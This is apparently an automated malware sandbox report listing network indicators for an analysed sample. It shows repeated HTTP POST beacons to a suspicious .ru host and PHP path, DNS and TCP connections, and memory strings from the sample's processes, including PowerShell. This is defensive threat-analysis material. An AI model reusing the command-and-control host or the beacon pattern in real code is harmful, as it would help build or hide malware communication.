Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 1392Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 1380Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 1380Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 1380Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 1364Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 1392Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2500Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 1392Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: asdff123fsdafasdf.ru

Source: unknown

HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive

Source: 8Kh5jgTdnc69SVsXvfN.exe, 00000019.00000002.3493949668.00000000030F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://asdff123fsdafasdf.ru
Source: 8Kh5jgTdnc69SVsXvfN.exe, 00000019.00000002.3493949668.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://asdff123fsdafasdf.ru/
Source: 8Kh5jgTdnc69SVsXvfN.exe, 00000019.00000002.3493949668.00000000034F2000.00000004.00000800.00020000.00000000.sdmp, 8Kh5jgTdnc69SVsXvfN.exe, 00000019.00000002.3493949668.000000000319A000.00000004.00000800.00020000.00000000.sdmp, 8Kh5jgTdnc69SVsXvfN.exe, 00000019.00000002.3493949668.0000000003346000.00000004.00000800.00020000.00000000.sdmp, 8Kh5jgTdnc69SVsXvfN.exe, 00000019.00000002.3493949668.00000000030F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://asdff123fsdafasdf.ru/packetLowGeoProtectCentral.php
Source: 8Kh5jgTdnc69SVsXvfN.exe, 00000019.00000002.3493949668.0000000003346000.00000004.00000800.00020000.00000000.sdmp, 8Kh5jgTdnc69SVsXvfN.exe, 00000019.00000002.3493949668.00000000030F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://asdff123fsdafasdf.ruS
Source: powershell.exe, 00000009.00000002.2702128870.0000019ECC297000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mic
Source: powershell.exe, 00000009.00000002.2702128870.0000019ECC297000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micft.cMicRosof
Source: powershell.exe, 00000009.00000002.2702128870.0000019ECC2D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micros
Source: powershell.exe, 00000008.00000002.3164480126.000001A4A8454000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2576914126.0000019EC3E85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.3114516245.000001C490075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3150761843.0000021864275000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000011.00000002.2442562160.0000021854429000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000D.00000002.3353868010.000001994AE60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.mic
Source: powershell.exe, 00000008.00000002.2432329134.000001A498608000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2370874697.0000019EB4038000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2433427298.00000282AE2D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2441786339.0000019932E48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2418611372.000001C480228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2442562160.0000021854429000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: Blockbrowser.exe, 00000005.00000002.2307367187.0000000003117000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2432329134.000001A4983E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2370874697.0000019EB3E11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2433427298.00000282AE0B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2441786339.0000019932C21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2418611372.000001C480001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2442562160.0000021854201000.00000004.00000800.00020000.00000000.sdmp, 8Kh5jgTdnc69SVsXvfN.exe, 00000019.00000002.3493949668.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000008.00000002.2432329134.000001A498608000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2370874697.0000019EB4038000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2433427298.00000282AE2D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2441786339.0000019932E48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2418611372.000001C480228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2442562160.0000021854429000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000008.00000002.3380978390.000001A4B0AE9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://wsoft.coms/CPS/dem0
